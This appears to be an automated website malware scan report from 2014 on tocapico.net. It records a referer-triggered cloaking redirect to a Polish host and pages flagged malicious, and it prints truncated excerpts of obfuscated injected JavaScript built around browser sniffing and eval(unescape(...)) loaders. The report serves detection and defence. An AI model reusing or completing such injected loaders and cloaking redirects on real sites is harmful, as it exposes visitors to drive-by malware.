Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://tocapico.net/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: tocapico.net Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 04 Sep 2014 05:33:25 GMT Location: http://lincau.osa.pl/se/ Server: Apache/1.3.41 (Unix) mod_layout/3.4 DAV/1.0.3 FrontPage/5.0.2.2635 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://tocapico.net/ | 200 OK Content-Length: 34006 Content-Type: text/html | clean |
http://tocapico.net/rdv/index.html | 200 OK Content-Length: 13176 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) l1l=document.all;var naa=true;ll1=document.layers;lll=window.sidebar;naa=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');naa|=lII;OO00=new Array();OO00[0]='<html>~zjead~script>eval(une~ape(\'\\146~ 65n%63~$4~ 51o~(E%20q%79%36~38~3~97B~(~96~<28wi~1~(~,157w~3~273~Cd~(5~(2a~ Antivirus reports:
| ||
http://tocapico.net/test404page.js | HTTP/1.1 302 Found Connection: close Date: Thu, 04 Sep 2014 05:33:27 GMT Location: http://lincau.osa.pl/se/ Server: Apache/1.3.41 (Unix) mod_layout/3.4 DAV/1.0.3 FrontPage/5.0.2.2635 Content-Type: text/html; charset=iso-8859-1 | clean |
http://lincau.osa.pl/se/ | 404 Not Found Content-Length: 320 Content-Type: text/html | clean |
http://lincau.osa.pl/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://tocapico.net/d/index.html | 200 OK Content-Length: 12866 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) l1l=document.all;var naa=true;ll1=document.layers;lll=window.sidebar;naa=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');naa|=lII;OOOO=new Array();OOOO[0]=' <html>~ead~script>eval(une~ape(\'fu\\156%63ti~\'F~\'E%20q~#71%3~&28~09%7B~#5~66~98w~A~C~/64o~#67~0E~N3~\'~=~K~#45~X Antivirus reports:
| ||
http://tocapico.net/salonbo/index.html | 200 OK Content-Length: 16973 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) l1l=document.all;var naa=true;ll1=document.layers;lll=window.sidebar;naa=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');naa|=lII;ybDA7643NqPxz=new Array();igXaRVm1cj1zU=new Array();igXaRVm1cj1zU[0]='c\127\126%31%4AW\126' ;ybDA7643NqPxz[0]='<html>\r\n~zaead><script>eval(une~ape(\'~r%20%71~(9%3 Antivirus reports:
|
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=tocapico.net
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://tocapico.net/
Result: tocapico.net is not infected or malware details are not published yet.
Result: tocapico.net is not infected or malware details are not published yet.